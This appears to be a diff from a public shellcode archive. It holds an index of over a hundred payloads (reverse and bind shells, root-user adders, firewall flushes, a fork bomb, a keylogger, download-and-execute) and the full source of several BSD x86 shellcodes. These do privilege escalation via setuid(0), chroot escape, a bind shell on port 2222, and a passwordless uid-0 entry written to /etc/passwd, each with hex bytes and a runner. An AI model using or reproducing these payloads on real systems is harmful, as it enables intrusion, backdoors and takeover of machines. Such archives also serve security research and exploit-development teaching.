652 43651 shellcodes/linux_x86/43651.c Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes) 2009-06-23 TheWorm shellcode linux_x86
653 43652 shellcodes/linux_x86/43652.c Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes) 2009-06-23 TheWorm shellcode linux_x86
654 43653 shellcodes/linux_x86/43653.c Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes) 2009-07-11 TheWorm shellcode linux_x86
655 43654 shellcodes/linux_x86/43654.c Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes) 2009-07-11 TheWorm shellcode linux_x86
656 43655 shellcodes/linux_x86/43655.c Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes) 2009-07-11 TheWorm shellcode linux_x86
657 43656 shellcodes/linux_x86/43656.c Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes) 2009-01-01 storm shellcode linux_x86
658 43657 shellcodes/linux_x86/43657.c Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes) 2009-01-01 storm shellcode linux_x86
659 43658 shellcodes/linux_x86/43658.c Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes) 2009-01-01 storm shellcode linux_x86
660 43660 shellcodes/linux_x86/43660.c Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes) 2009-01-01 anonymous shellcode linux_x86
661 43661 shellcodes/linux_x86/43661.c Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) 2000-12-20 Cody Tubbs shellcode linux_x86
662 43662 shellcodes/linux_x86/43662.c Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes) 2009-01-01 zillion shellcode linux_x86
663 43663 shellcodes/linux_x86/43663.c Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes) 2009-01-01 zillion shellcode linux_x86
664 43664 shellcodes/linux_x86/43664.c Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes) 2009-01-01 zillion shellcode linux_x86
665 40549 shellcodes/windows_x86-64/40549.c Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
666 40560 shellcodes/windows_x86/40560.asm Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
667 40781 shellcodes/windows_x86-64/40781.c Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
668 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
669 40821 shellcodes/windows_x86-64/40821.c Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
670 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
671 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
672 40981 shellcodes/windows_x86-64/40981.c Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
673 41072 shellcodes/windows_x86-64/41072.c Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
674 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
675 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
676 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
677 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
678 41220 shellcodes/generator/41220.c Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
679 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
686 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
687 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
688 41481 shellcodes/windows_x86/41481.asm Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
689 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
690 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
691 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
692 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
693 41581 shellcodes/windows_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
694 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
695 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve /bin/dash Shellcode (30 bytes) Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
696 43480 shellcodes/alpha/43480.c Alpha - /bin/sh Shellcode (80 bytes) 2009-01-01 Lamont Granquist shellcode alpha
697 43481 shellcodes/alpha/43481.c Alpha - execve() Shellcode (112 bytes) 2009-01-01 anonymous shellcode alpha
698 43482 shellcodes/alpha/43482.c Alpha - setuid() Shellcode (156 bytes) 2009-01-01 anonymous shellcode alpha
699 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
700 43489 shellcodes/linux_x86/43489.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode linux_x86
701 43497 shellcodes/arm/43497.asm Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes) 2018-01-11 Azeria shellcode arm
702 43502 shellcodes/freebsd_x86-64/43502.txt FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes) 2009-01-01 Gitsnik shellcode freebsd_x86-64
703 43503 shellcodes/freebsd_x86-64/43503.txt FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) 2009-01-11 Gitsnik shellcode freebsd_x86-64
704 43504 shellcodes/freebsd_x86/43504.asm FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) 2009-01-01 Tosh shellcode freebsd_x86
705 43505 shellcodes/freebsd_x86/43505.c FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes) 2009-01-01 antrhacks shellcode freebsd_x86
706 43506 shellcodes/freebsd_x86/43506.c FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes) 2009-01-01 zillion shellcode freebsd_x86
707 43507 shellcodes/freebsd_x86/43507.c FreeBSD - reboot() Shellcode (15 Bytes) FreeBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 zillion shellcode freebsd_x86
708 43508 shellcodes/irix/43508.c IRIX - execve(/bin/sh -c) Shellcode (72 bytes) 2009-01-01 anonymous shellcode irix
709 43509 shellcodes/irix/43509.c IRIX - execve(/bin/sh) Shellcode (43 bytes) 2009-01-01 anonymous shellcode irix
710 43510 shellcodes/irix/43510.c IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes) 2009-01-01 scut/teso shellcode irix
728 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
729 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
730 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
731 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
732 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
733 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
734 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
735 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
736 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
737 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
738 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
739 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
740 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
741 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
742 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
743 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
744 41750 shellcodes/linux_x86-64/41750.txt Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
745 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve /bin/sh Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) 2017-03-29 WangYihang shellcode linux_x86
746 41827 shellcodes/windows_x86-64/41827.txt Windows 10 x64 - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
747 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
748 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
749 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
750 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
751 42016 shellcodes/windows/42016.asm Windows x86/x64 - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
752 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
753 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
754 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
755 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
756 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
757 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
758 42428 shellcodes/linux_x86/42428.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
759 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
760 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
761 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
763 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
764 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
765 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
766 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
767 42992 shellcodes/windows_x86-64/42992.c Windows x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
768 43463 shellcodes/linux/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux

0
shellcodes/windows/15116.cpp → shellcodes/arm/15116.cpp
View file

0
shellcodes/linux_x86/13426.c → shellcodes/bsd_x86/13426.c
View file

0
shellcodes/linux_x86/13430.c → shellcodes/bsd_x86/13430.c
View file

0
shellcodes/linux_x86/13453.c → shellcodes/bsd_x86/13453.c
View file

65
shellcodes/bsd_x86/43627.c Normal file
View file

@ -0,0 +1,65 @@
/* The setuid(0)+chroot()+execve shellcode
it will:
setuid(0)
put '../' 10 times in chroot()
execute /bin/sh
Size 57 bytes
OS *BSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
xor ecx,ecx
xor eax,eax
push eax
mov al,0x17
push eax
int 0x80
push ecx
mov cl,0x1e
main_push:
push byte 0x2e
loop main_push
mov cl,0x1e
main_loop:
dec cl
inc byte [esp+ecx]
dec cl
loop main_loop
push esp
mov al,0x3d
push eax
int 0x80
xor eax,eax
push eax
push long 0x68732f6e
push long 0x69622f2f
mov ebx,esp
push eax
push esp
push ebx
mov al,0x3b
push eax
int 0x80
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e"
"\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0"
"\x3d\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

110
shellcodes/bsd_x86/43628.c Normal file
View file

@ -0,0 +1,110 @@
/* The setuid(0)+chroot()+bind shellcode
it will:
setuid(0)
put '../' 10 times in chroot()
open shell on 2222nd port
Size 133 bytes
OS *BSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
main:
xor ecx,ecx
xor eax,eax
push eax
mov al,0x17
push eax
int 0x80
push ecx
mov cl,0x1e
main_push:
push byte 0x2e
loop main_push
mov cl,0x1e
main_loop1:
dec cl
inc byte [esp+ecx]
dec cl
loop main_loop1
push esp
mov al,0x3d
push eax
int 0x80
push byte 0x06
push byte 0x01
push byte 0x02
mov al,0x61
push eax
int 0x80
mov edx,eax
xor eax,eax
push eax
push long 0xAE0802ff
mov eax,esp
push byte 0x10
push eax
push edx
xor eax,eax
mov al,0x68
push eax
int 0x80
push byte 0x1
push edx
xor eax,eax
mov al,0x6a
push eax
int 0x80
xor eax,eax
push eax
push eax
push edx
mov al,0x1e
push eax
int 0x80
mov cl,3
mov ebx,-1
mov edx,eax
main_loop:
inc ebx
push ebx
push edx
mov al,0x5a
push eax
int 0x80
dec cl
jnz main_loop
xor eax,eax
push eax
push long 0x68732f6e
push long 0x69622f2f
mov ebx,esp
push eax
push esp
push ebx
mov al,0x3b
push eax
int 0x80
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e"
"\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0"
"\x3d\x50\xcd\x80\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80"
"\x89\xc2\x31\xc0\x50\x68\xff\x02\x08\xae\x89\xe0\x6a\x10\x50"
"\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a"
"\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03"
"\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80"
"\xfe\xc9\x75\xf4\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

83
shellcodes/bsd_x86/43629.c Normal file
View file

@ -0,0 +1,83 @@
/* The bind shellcode that opens the shell on 2222nd port
Size 100 bytes
OS *BSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
main:
xor eax,eax
push byte 0x06
push byte 0x01
push byte 0x02
mov al,0x61
push eax
int 0x80
mov edx,eax
xor eax,eax
push eax
push long 0xAE0802ff
mov eax,esp
push byte 0x10
push eax
push edx
xor eax,eax
mov al,0x68
push eax
int 0x80
push byte 0x1
push edx
xor eax,eax
mov al,0x6a
push eax
int 0x80
xor eax,eax
push eax
push eax
push edx
mov al,0x1e
push eax
int 0x80
mov cl,3
mov ebx,-1
mov edx,eax
main_loop:
inc ebx
push ebx
push edx
mov al,0x5a
push eax
int 0x80
dec cl
jnz main_loop
xor eax,eax
push eax
push long 0x68732f6e
push long 0x69622f2f
mov ebx,esp
push eax
push esp
push ebx
mov al,0x3b
push eax
int 0x80
*/
char shellcode[] =
"\x31\xc0\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2"
"\x31\xc0\x50\x68\xff\x02\x08\xae\x89\xe0\x6a\x10\x50\x52\x31"
"\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd"
"\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff"
"\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc9"
"\x75\xf4\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

45
shellcodes/bsd_x86/43632.c Normal file
View file

@ -0,0 +1,45 @@
/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
in the !!world!!
it will put '../' 10 times
Size 34 bytes
OS *BSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
xor ecx,ecx
xor eax,eax
push eax
mov al,0x17
push eax
int 0x80
push ecx
mov cl,0x1e
main_push:
push byte 0x2e
loop main_push
mov cl,0x1e
main_loop:
dec cl
inc byte [esp+ecx]
dec cl
loop main_loop
push esp
mov al,0x3d
push eax
int 0x80
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e"
"\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0"
"\x3d\x50\xcd\x80";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

39
shellcodes/bsd_x86/43635.c Normal file
View file

@ -0,0 +1,39 @@
/* One of the smallest chroot shellcodes in the !!world!!
it will put '../' 10 times
Size 28 bytes
OS *BSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
xor ecx,ecx
xor eax,eax
push ecx
mov cl,0x1e
main_push:
push byte 0x2e
loop main_push
mov cl,0x1e
main_loop:
dec cl
inc byte [esp+ecx]
dec cl
loop main_loop
push esp
mov al,0x3d
push eax
int 0x80
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x51\xb1\x1e\x6a\x2e\xe2\xfc\xb1\x1e\xfe\xc9"
"\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0\x3d\x50\xcd\x80";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

48
shellcodes/bsd_x86/43636.c Normal file
View file

@ -0,0 +1,48 @@
/* One of the smallest chroot shellcodes
it will put '../' 10 times
Size 40 bytes
OS *BSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
mov edi,esi
xor ecx,ecx
xor eax,eax
push eax
mov cl,0x1e
mov al,0x2e
repne stosb
pop eax
stosb
mov cl,0x1e
main_loop:
dec cl
inc byte [esi+ecx]
dec cl
loop main_loop
push esi
mov al,0x3d
push eax
int 0x80
callme:
call main
*/
char shellcode[] =
"\xeb\x21\x5e\x89\xf7\x31\xc9\x31\xc0\x50\xb1\x1e\xb0\x2e\xf2"
"\xaa\x58\xaa\xb1\x1e\xfe\xc9\xfe\x04\x0e\xfe\xc9\xe2\xf7\x56"
"\xb0\x3d\x50\xcd\x80\xe8\xda\xff\xff\xff";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

47
shellcodes/bsd_x86/43640.c Normal file
View file

@ -0,0 +1,47 @@
/*The shellcode calls the symlink() and makes the
link to the /bin/sh in the current dir.
size = 39 bytes
OS = *BSD
written by /rootteam/dev0id (rootteam.void.ru)
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
mov byte [esi+7],al
mov byte [esi+10],al
lea ebx,[esi+8]
push ebx
lea ebx,[esi]
push ebx
mov al,57
push eax
int 0x80
callme:
call main
db '/bin/sh#sh#'
*/
char shellcode[] =
"\xeb\x15\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x8d\x5e\x08\x53"
"\x8d\x1e\x53\xb0\x39\x50\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x23\x73\x68\x23";
int
main (void)
{
void (*code)(void);
code=(void(*)())shellcode;
(void)code();
return 0;
}

58
shellcodes/bsd_x86/43642.c Normal file
View file

@ -0,0 +1,58 @@
/*************************************************************
writes the line for user in /etc/passwd with uid&gid == 0
OS: *BSD
length: 74
written by dev0id dev0id@mail.ru (rootteam.void.ru)
#rus-sec /Efnet.org
greetz:
mig
nerf
*************************************************************
BITS 32
main:
xor eax,eax
push eax
push byte 0x64
push word 0x7773
push long 0x7361702f
push long 0x6374652f
mov ebx,esp
mov al,0x0a
push eax
push ebx
mov al,5
push eax
int 0x80
mov edx,eax
push long 0x0a206873
push long 0x2f6e6962
push long 0x2f3a2f3a
push long 0x313a303a
push long 0x303a3a31
mov ebx,esp
mov al,20
push eax
push ebx
push edx
mov al,4
push eax
int 0x80
mov al,1
push eax
int 0x80
*************************************************************
char shellcode[] =
"\x31\xc0\x50\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68"
"\x2f\x65\x74\x63\x89\xe3\xb0\x0a\x50\x53\xb0\x05\x50\xcd\x80"
"\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f\x68\x3a\x2f"
"\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30\x89\xe3\xb0"
"\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";

50
shellcodes/bsd_x86/43644.asm Normal file
View file

@ -0,0 +1,50 @@
/*
simply execve_binsh+seteuid(0) shellcode in 31 bytes
written on nasm - my first nasm exp.
greetz2:
mig #darknet /EFnet.org
nerf #nerf /EFnet.org
dev0id #rus-sec /EFnet.org (rootteam.void.ru)
*/
char shellcode[] =
"\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd"
"\x80";
void
main()
{
int *ret;
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
/****************************************
--------------start---------------------
BITS 32
main:
xor eax,eax
push eax
mov al,183
int 0x80
push eax
xor eax,eax
push eax
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push eax
push esp
push ebx
mov al,59
push eax
int 0x80
;mov al,1 need exit? I do not!
;push eax
;int 0x80
---------------end----------------------
compilation:
%nasm code.s -o code
****************************************/

46
